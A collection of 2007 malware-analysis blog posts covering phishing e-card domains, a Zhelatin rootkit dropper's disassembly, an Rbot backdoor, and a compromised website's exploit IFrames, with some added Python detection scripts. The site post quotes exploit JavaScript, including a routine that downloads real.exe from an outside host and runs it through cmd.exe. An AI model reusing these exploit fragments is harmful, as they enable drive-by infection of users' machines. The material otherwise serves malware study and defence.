[Malware] The Phishing Storm of 2008

December 30, 2007

Caution: the following post contains explicit malware content, be careful!!!!

As at every end of year, the Web registers a significant increase of malware attacks on various fronts, in particular website phishing frauds, file infections and new rootkits.

This information can be verified by consulting http://www.antiphishing.org/

Obviously 90% of frauds come from fake websites themed on the current holidays, such as Christmas gifts and online E-Card / postcard services. In the last days, for example, I’ve found two phishing E-Card websites:

familypostcards2008.com

uhavepostcard.com

Let’s look up these websites:

———————————

Domain name:             UHAVEPOSTCARD.COM
Name Server:             ns.uhavepostcard.com 74.66.92.4
Name Server:             ns10.uhavepostcard.com 193.150.206.29
Name Server:             ns11.uhavepostcard.com 24.151.246.25
Name Server:             ns12.uhavepostcard.com 78.60.126.188
Name Server:             ns13.uhavepostcard.com 78.60.126.188
Name Server:             ns2.uhavepostcard.com 71.11.228.181
Name Server:             ns3.uhavepostcard.com 76.236.158.155
Name Server:             ns4.uhavepostcard.com 76.226.91.98
Name Server:             ns5.uhavepostcard.com 68.45.61.150
Name Server:             ns6.uhavepostcard.com 65.35.110.50
Name Server:             ns7.uhavepostcard.com 67.58.159.109
Name Server:             ns8.uhavepostcard.com 70.92.107.11
Name Server:             ns9.uhavepostcard.com 12.216.86.166
Creation Date:           2007.12.23
Updated Date:            2007.12.24
Expiration Date:         2008.12.23
---------------------------------
Domain name:             FAMILYPOSTCARDS2008.COM
Name Server:             ns.familypostcards2008.com 71.130.195.9
Name Server:             ns10.familypostcards2008.com 86.137.196.186
Name Server:             ns11.familypostcards2008.com 78.60.126.188
Name Server:             ns12.familypostcards2008.com 76.174.52.123
Name Server:             ns13.familypostcards2008.com 71.230.66.163
Name Server:             ns2.familypostcards2008.com 76.205.135.226
Name Server:             ns3.familypostcards2008.com 75.9.137.204
Name Server:             ns4.familypostcards2008.com 76.206.232.36
Name Server:             ns5.familypostcards2008.com 98.201.54.7
Name Server:             ns6.familypostcards2008.com 69.247.162.86
Name Server:             ns7.familypostcards2008.com 74.161.36.118
Name Server:             ns8.familypostcards2008.com 12.217.82.249
Name Server:             ns9.familypostcards2008.com 193.150.206.29
Creation Date:           2007.12.29
Updated Date:            2007.12.29
Expiration Date:         2008.12.29

———————————

It’s truly curious that these domains come from Los Angeles and were created only for these holidays 🙂
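The whois records above show the pattern worth keying on: a dozen name servers inside the domain itself, each on an unrelated network (typical of infected home machines), on a domain registered a few days earlier. As an added example, not part of the original post, this Python parses whois text in the layout shown above and scores it; the sample is an excerpt of the uhavepostcard.com record and the thresholds are assumptions.

```python
import re
from datetime import date

# Excerpt of the uhavepostcard.com whois record quoted in the post
# (constructed subset: five of the thirteen name servers).
WHOIS_SAMPLE = """Domain name:      UHAVEPOSTCARD.COM
Name Server:      ns.uhavepostcard.com 74.66.92.4
Name Server:      ns10.uhavepostcard.com 193.150.206.29
Name Server:      ns11.uhavepostcard.com 24.151.246.25
Name Server:      ns12.uhavepostcard.com 78.60.126.188
Name Server:      ns2.uhavepostcard.com 71.11.228.181
Creation Date:    2007.12.23
Updated Date:     2007.12.24
Expiration Date:  2008.12.23
"""

NS_RE = re.compile(r"^Name Server:\s+(\S+)\s+(\d+\.\d+\.\d+\.\d+)", re.M)
DATE_RE = re.compile(r"^(Creation|Expiration) Date:\s+(\d{4})\.(\d{2})\.(\d{2})", re.M)

def parse_whois(text):
    """Return (domain, [(ns_name, ip), ...], {field: date}) from whois-style text."""
    m = re.search(r"^Domain name:\s+(\S+)", text, re.M)
    domain = m.group(1).lower() if m else ""
    servers = NS_RE.findall(text)
    dates = {k: date(int(y), int(mo), int(d)) for k, y, mo, d in DATE_RE.findall(text)}
    return domain, servers, dates

def flux_indicators(text, today_iso):
    """Score a record for the throwaway e-card pattern: many name servers
    inside the domain itself, spread over unrelated /16 networks, and a
    registration only days old. Thresholds are assumptions for this example."""
    domain, servers, dates = parse_whois(text)
    today = date.fromisoformat(today_iso)
    in_bailiwick = sum(1 for ns, _ in servers if ns.endswith("." + domain))
    slash16 = {".".join(ip.split(".")[:2]) for _, ip in servers}
    age = (today - dates["Creation"]).days if "Creation" in dates else None
    suspicious = (in_bailiwick >= 5 and len(slash16) >= 4
                  and age is not None and 0 <= age <= 14)
    return {"domain": domain, "nameservers": len(servers),
            "in_bailiwick": in_bailiwick, "distinct_slash16": len(slash16),
            "age_days": age, "suspicious": suspicious}
```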

The spread malware is always the same, but under different file names:

  • happy_2008.exe
  • Happy2008.exe
  • stripshow.exe
  • happynewyear2008.exe

So pay attention to these Postcard sites.. 😉

Regards,

Evilcry


[MALWARE] Happy-2008.exe Win32.Zhelatin.pk Rootkit

December 29, 2007

Happy-2008 seems to be a new kind of virus, created for the new year.

It’s spread in the form of an executable, not packed or PE-tricked.
It can be downloaded from an E-Card website.

At present it seems that AVs do not detect it; only some show it as
Suspect-Zipped-File.

.:: The Essay :..
It gets the current system directory and then sets /system32 as the working
directory.
Next, with GetFullPathNameA, it retrieves "C:\WINDOWS\System32\init_sys.config".

If the file exists, it tries to determine its attributes; otherwise it creates the file:

0040126A  PUSH EBX                                 ; /hTemplateFile => NULL
0040126B  PUSH 80                                  ; |Attributes = NORMAL
00401270  PUSH 2                                   ; |Mode = CREATE_ALWAYS
00401272  PUSH EBX                                 ; |pSecurity => NULL
00401273  PUSH 7                                   ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE|4
00401275  PUSH 40000000                            ; |Access = GENERIC_WRITE
0040127A  LEA EAX,DWORD PTR SS:[EBP-114]           ; |
00401280  PUSH EAX                                 ; |FileName = "C:\WINDOWS\System32\init_sys.config"
00401281  CALL DWORD PTR DS:[<&KERNEL32.CreateFile>; \CreateFileA

00401293  PUSH ESI ;Points to an Embedded Executable
00401294  PUSH EDI
00401295  MOV EDI,DWORD PTR DS:[<&KERNEL32.WriteFi>;  kernel32.WriteFile
0040129B  PUSH 0
0040129D  LEA EAX,DWORD PTR SS:[EBP-C] ;System Path
004012A0  PUSH EAX
004012A1  LEA ESI,DWORD PTR DS:[EBX+422A98] ; [config] String
004012A7  PUSH DWORD PTR DS:[ESI]

A file "init_sys.config" is created and filled with three entries:
[config]
[local]
[peers]
Subsequently, a series of values are appended to this config file immediately
after [peers]; they have this form:

00003D6C8F338A3FDD3DF3648666F55C=0CCFC042170F00

0040132D  CALL happy-20.0040122D       ;Builds init_sys.config and fills it
00401332  LEA ECX,DWORD PTR SS:[EBP-8]
00401335  CALL happy-20.004016E8

00401351  CALL happy-20.00401634 ;EAX = String obtained from GetSystemTime Output

After some calls, EAX points to a new string "init_1a30-12f1"

00401391   PUSH EAX                                 ; /pFilenameInPath
00401392   PUSH DWORD PTR SS:[EBP-8]                ; |Path
00401395   PUSH EBX                                 ; |MaxPathSize
00401396   PUSH DWORD PTR SS:[EBP-4]                ; |FileName
00401399   CALL DWORD PTR DS:[<&KERNEL32.GetFullPat>; \GetFullPathNameA
0040139F   PUSH happy-20.004020D4                   ;  ASCII ".sys"
004013A4   LEA ECX,DWORD PTR SS:[EBP-8]
004013A7   CALL happy-20.00401108

Inside the call 00401108 a new string is assembled, "init_1a30-12f1.sys".
Please note that the numerical part of the .sys file name changes at every run,
because it depends on the GetSystemTime output.

004013B1   PUSH ESI ;NULL
004013B2   PUSH ESI ;NULL
004013B3   CALL OpenSCManagerA
004013B9   CMP EAX,ESI
004013BB   MOV DWORD PTR SS:[EBP-C],EAX
004013BE   JE happy-20.004014D9

After opening the Service Control Manager on the local host, the service status list is enumerated and:

00401407  PUSH DWORD PTR SS:[EBP-18]             ; /Arg3
0040140A  PUSH EDI                               ; |Arg2
0040140B  PUSH DWORD PTR DS:[EBX]                ; |Arg1 = 0012FE62 ASCII “Abiosdsk”
0040140D  CALL happy-20.00401579                 ; \happy-20.00401579

This call compares the names of the services present in the system with ‘init_’:

abp480n5,ACPI,adpu16, etc..

After this check, GetLastError is called:

0040142E  JNZ SHORT happy-20.0040143D
00401430  CALL GetLastError
00401436  CMP EAX,0EA                  ; 0xEA = ERROR_MORE_DATA (234): enumeration buffer too small, loop again
0040143B  JE SHORT happy-20.004013D1

If the service exists and is running, the task of happy_2008 ends here.
Otherwise, a copy of a device driver is extracted from the executable and run as a
kernel service.

I’ve extracted that device driver with a hex editor; it starts at 00403018 and ends at
00424FF8.

This rootkit hides itself, but in the next part we will discover what it
does 🙂

See you in the second part.. 🙂


(Merry Christmas || Happy Sol Invictus)

December 24, 2007

Merry Christmas!!!!!!!

May this Christmas be full of Peace and Serenity for You and Your Families..

Regards,

Evilcry


The Thousands Ways of SPAM [CartaSi Fraud]

December 22, 2007

Hi,

As every day, also this morning I’ve checked my honeypot mail address, and a curious mail message reached me; this is the original recipient:

Dear Customer,

The security code of your online account has been entered incorrectly more than three times.
To protect your account we have suspended access.
To recover access please log in and complete the activation page.

Thank you again for choosing CartaSi’s online services.
Best regards.

CartaSi Customer Service
****************************************************************
DO YOU WANT TO DISPUTE A CHARGE?

Easy Claim, the service for you!

****************************************************************

Please do not reply to this mail: for any communication, log in to the Portale Titolari (http://www.cartasi.it//) and write to us through ‘Lo sportello del Cliente’: it is the simplest way to get a quick answer from our operators.
Thank you for your cooperation.
++++++++++++++++++++++++++++++++++

CartaSi is a bank service, but it is really strange that the subject has grammar errors; let’s trace the first link with Malzilla..

WebSite: http://aquarossall.plus.com/

The first operation is a whois on this strange link, which exposes music album covers..

—————

Website Title: PlusNet | Home & Business Broadband Internet Access & Phone Services UK
Title Relevancy 77%

—————————————

The link comes from the PlusNet network; Malzilla also detects a chain of redirections:

–> djtees.com/
–> djtees.com/tshop/store/default.asp?idAffiliate=
Redirection to index.asp –> djtees.com/tshop/store/index.asp
The website is not dangerous, but it is surely boring to see these stupid forms of spam.

See you in the next post.. 🙂


[MALWARE] Multiple Malware and Exploits on a Chinese WebSite

December 20, 2007

Hi,

A new virus similar to 31joy.com/rb.vg has attacked some websites (one in particular {CENSORED}.biz); it appears to change the IP address of infected machines to the gateway address, throwing the local network into chaos and infecting additional machines.

Victims that browse this website are first exploited (if poorly armored) and then infected by adware and spyware.

I’ve analysed the website with Malzilla; the infection is a classical one: it inserts malicious code at the top of the pages, so when a victim visits the site 4 infected IFrames are loaded, and some ‘.js‘ and ‘.cab‘ files are downloaded.

hxxp://{CENSORED}.biz/index.html
hxxp://{CENSORED}.biz/2.htm
hxxp://{CENSORED}.biz/xl.htm
http://CENSORED.php?idCENSOREDweCENSORED=pic1

Let’s analyse the first IFrame; a .js is loaded:

function RealExploit()
{
var user = navigator.userAgent.toLowerCase();
if(user.indexOf("msie 6")==-1&&user.indexOf("msie 7")==-1)

[…]

else if(RealVersion == "6.0.14.544")
ret = unescape("%63%11%08%60");
else if(RealVersion == "6.0.14.550")
ret = unescape("%63%11%04%60");
else if(RealVersion == "6.0.14.552")
ret = unescape("%79%31%01%60");
else if(RealVersion == "6.0.14.543")
ret = unescape("%79%31%09%60");
else if(RealVersion == "6.0.14.536")
ret = unescape("%51%11%70%63");

[…]

}

It’s clear that the first IFrame launches the well-known RealTime exploit that allows remote code execution (the version switch above selects a payload per installed RealVersion).

The second IFrame, 2.htm, leads to another JavaScript:

function init()
{

var ado=(document.createElement("object"));
ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");

This CLSID is suspicious; let’s search for it. It’s another common exploit: RDS.DataStore – Data Execution (CVE-2006-0003 / MS06-014). The IFrame itself loads other objects:
0614.js
MPS.js
PowerPlayerCtrl.js

4.CAB -> that contains bd.exe OR r.exe and is Worm/Cekar.A

Let’s see the first 0614.js :

var url="http://{CENSORED}/real.exe";
[…]
xml.Open("GET",url,0);
xml.Send();
as.type=1;
as.open();
as.write(xml.responseBody);
path="..\\ntuser.com";
as.savetofile(path,2);
as.close();
var shell=ado.createobject("Shell.Application","");
shell.ShellExecute("cmd.exe","/c " + path,"","open",0)}
[…]
The previous Data Execution exploit calls this JavaScript, which downloads and executes real.exe; that is obviously a virus, Win32.Worm.Cekar..

W32/Cekar-A includes functionality to download code from a preconfigured website to the local disk.

When first run W32/Cekar-A creates the following files:

\setup.exe
<System>\internat.exe
\autorun.inf

–> Third IFrame xl.htm

It calls clsid:F3E70CEA-956E-49CC-B444-73AFE593AD7F, which is another exploit: it attempts to trigger a buffer overflow vulnerability in the Xunlei Thunder PPLAYER.DLL_1_WORK ActiveX control, leading to another remote code execution.

–> The last IFrame seems to be only a counter
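The four IFrames share a small set of static indicators: the two CLSIDs named above, the ADODB.Stream savetofile / ShellExecute pair, the RealVersion switch and hidden IFrames. As an added example, not part of the original post, this Python runs those indicators over a constructed page assembled from the fragments quoted above; the width=0 IFrame, the rule set and the score are assumptions of mine.

```python
import re

# Constructed sample page combining the fragments quoted in the post
# (the hidden-IFrame attributes are assumed, the rest is as quoted).
SAMPLE_PAGE = """<iframe src="2.htm" width=0 height=0></iframe>
<script>
var ado=(document.createElement("object"));
ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
xml.Open("GET",url,0); xml.Send();
as.type=1; as.open(); as.write(xml.responseBody);
as.savetofile(path,2);
shell.ShellExecute("cmd.exe","/c " + path,"","open",0)
</script>
<object classid="clsid:F3E70CEA-956E-49CC-B444-73AFE593AD7F"></object>
"""

# CLSIDs named in the post and the controls they identify
KNOWN_CLSIDS = {
    "BD96C556-65A3-11D0-983A-00C04FC29E36": "RDS.DataSpace (MS06-014)",
    "F3E70CEA-956E-49CC-B444-73AFE593AD7F": "Xunlei Thunder PPLAYER.DLL_1_WORK",
}

# Each rule is (name, pattern); a page is scored by how many fire.
RULES = [
    ("hidden_iframe", re.compile(r"<iframe[^>]*\b(width|height)\s*=\s*['\"]?0\b", re.I)),
    ("adodb_stream_drop", re.compile(r"\.savetofile\s*\(", re.I)),
    ("shellexecute_cmd", re.compile(r"ShellExecute\s*\(\s*['\"]cmd\.exe", re.I)),
    ("realplayer_version_switch", re.compile(r"RealVersion\s*==\s*['\"]6\.0\.14\.\d+", re.I)),
]
CLSID_RE = re.compile(r"clsid:([0-9A-F]{8}(?:-[0-9A-F]{4}){3}-[0-9A-F]{12})", re.I)

def scan_page(html):
    """Return the rule names and known exploit CLSIDs that fire on the page,
    plus a simple score (one point per hit)."""
    hits = [name for name, rx in RULES if rx.search(html)]
    clsids = [KNOWN_CLSIDS[c.upper()] for c in CLSID_RE.findall(html)
              if c.upper() in KNOWN_CLSIDS]
    return {"rules": hits, "clsids": clsids, "score": len(hits) + len(clsids)}
```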

See you in the next post! 🙂


Crypto Reverse Engineering Speech

December 18, 2007

Hi,

I’m working on a chat-conference speech on Cryptography and Reverse Engineering for the Reversity program promoted by Reteam.

Obviously I accept suggestions and topics to talk about 🙂

First Reversity Session: POSTPONED to Sunday Jan 6 2008 12:00 EST (GMT-5) or 17:00 GMT

On EFNet chan: #reversity

In the next days I’ll publish the talk index here.

See you in the next post.. 🙂


RBN (Russian Business Network) Analysis

December 7, 2007

Hi,

There are some places in the world where life is dangerous. Internet has some dark zones too and RBN is one of them. RBN stands for Russian Business Network and it’s a nebulous organisation which aims to fulfil cyber crime.

This study aims to provide some enlightenment on RBN activities and tries to detail how they work. Indeed RBN has many constituents and it’s hard to have an exact idea on the goal of some of them and the way they’re linked with other constituents.
There are some countermeasures available, but they don’t make sense for home users or even companies. Only ISPs, IXPs and internet regulators can help mitigate the risks originating from RBN and other malicious groups.

http://research-labs.net/news/13-Russian+Business+Network+study.html

http://www.bizeul.org/files/RBN_study.pdf

See you in the next post.. 🙂


[Malware] Backdoor.Win32.Rbot.clj Reversing

December 1, 2007

Hi,

Kaspersky Identification: Backdoor.Win32.Rbot.clj
MD5: 59c661ba0c7c485f4480f7b142a9c084

Backdoor.Rbot gives its user remote access to victim machines. The trojan is controlled via IRC and performs various data-theft operations:

  • Sniffing network packets for passwords to FTP servers and e-payment systems.
  • Vulnerability checks (RPC DCOM, UPnP, WebDAV).
  • Checks for other backdoors (NetDevil, SubSeven).
  • Bridge for DoS attacks.
  • Sending the bot’s operator detailed information about the victim machine, including passwords to a range of computer games.

Rbot is a really stupid and unsophisticated virus, currently detected by all antiviruses, and can be removed in 1 minute by hand.

Rbot is packed with NSPack v2.9, a truly common packer/compressor used in many viruses.
Unpacking it is truly easy:

.nsp1:004DF1B4       pushf ; EP
.nsp1:004DF1B5       pusha

.nsp1:004DF424        popa
.nsp1:004DF425        popf
.nsp1:004DF426        jmp     near ptr dword_4DC8D0 ;OEP

You only have to put a breakpoint on the JMP to the OEP, then dump and rebuild the executable, and you’ll have a 100% clean executable.
The following registry entries are added:

HKLM\Software\Microsoft\Windows\CurrentVersion\Run
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices

and at each execution Rbot copies itself (every time with a different name) into the %System% directory.

Rbot can spread itself in various manners:

Via Network Shares (TCP ports 139 and 445)
Via Exploits like Windows LSASS buffer overflow, Windows ntdll.dll buffer overflow, Windows RPC malformed message buffer overflow, RPCSS malformed DCOM, UPnP, DameWare.

Via other Malicious Code:

  • Win32.Bagle worm (TCP port 2745)
  • Win32.Mydoom worm (TCP port 3127)
  • Win32.OptixPro trojan (TCP port 3410)
  • Win32.NetDevil trojan (TCP port 903)
  • Win32.Kuang trojan (TCP port 17300)
  • Win32.SubSeven trojan (TCP port 27347)

.:: Rbot Removal ::.

Locate the executable in the %System% directory and remove it (remember that the .exe is hidden).
Remove the registry entries:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices

See you in the next post..


[Malware] nugbnljbphe.exe

December 1, 2007

Morning,

Today when I started my PC, a strange executable, “nugbnljbphe.exe”, caused me some problems. I suspect that it’s malware; Kaspersky does not recognize it.

My suspicions are confirmed by the presence of an .nsp0 section, which indicates the presence of the NSPack packer, heavily used in malware executables.
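Both this post and the Rbot post above use the same tell: NSPack names its sections .nsp0/.nsp1, and the unpacking-stub section carries a large virtual size but little or no data on disk. As an added example, not part of the original posts, this Python walks a PE section table and reports those two indicators; the sample PE is constructed in memory (not a real sample) and the size threshold is an assumption.

```python
import struct

# Section names used by common packers; the .nsp* names are NSPack's.
PACKER_SECTIONS = {".nsp0": "NSPack", ".nsp1": "NSPack", ".nsp2": "NSPack",
                   "UPX0": "UPX", "UPX1": "UPX"}

def build_sample_pe(sections):
    """Construct a minimal PE32 image in memory (test input, not a real sample):
    DOS header, PE signature, file header, zeroed optional header and one
    section header per (name, virtual_size, raw_size)."""
    opt_size = 224
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)          # e_lfanew: PE header follows DOS header
    file_hdr = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x102)
    table = b"".join(
        struct.pack("<8sIIIIIIHHI", name.encode(), vsize, 0x1000, rsize, 0x400,
                    0, 0, 0, 0, 0xE0000020)
        for name, vsize, rsize in sections)
    return bytes(dos) + b"PE\0\0" + file_hdr + bytes(opt_size) + table

def read_sections(data):
    """Walk the section table: [(name, virtual_size, raw_size), ...]."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    pe = struct.unpack_from("<I", data, 0x3C)[0]
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    nsec = struct.unpack_from("<H", data, pe + 6)[0]        # NumberOfSections
    opt_size = struct.unpack_from("<H", data, pe + 20)[0]   # SizeOfOptionalHeader
    off = pe + 24 + opt_size
    out = []
    for i in range(nsec):
        name, vsize, _, rsize = struct.unpack_from("<8sIII", data, off + 40 * i)
        out.append((name.rstrip(b"\0").decode(errors="replace"), vsize, rsize))
    return out

def packer_indicators(data):
    """Name-based packer identification plus the unpacking-stub shape:
    a section with a large virtual size and no raw bytes on disk."""
    findings = []
    for name, vsize, rsize in read_sections(data):
        if name in PACKER_SECTIONS:
            findings.append(f"{name}: {PACKER_SECTIONS[name]} section name")
        if rsize == 0 and vsize >= 0x1000:
            findings.append(f"{name}: virtual size {vsize:#x} with no raw data")
    return findings
```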

I’m going to reverse it..

See you in the next post.. 🙂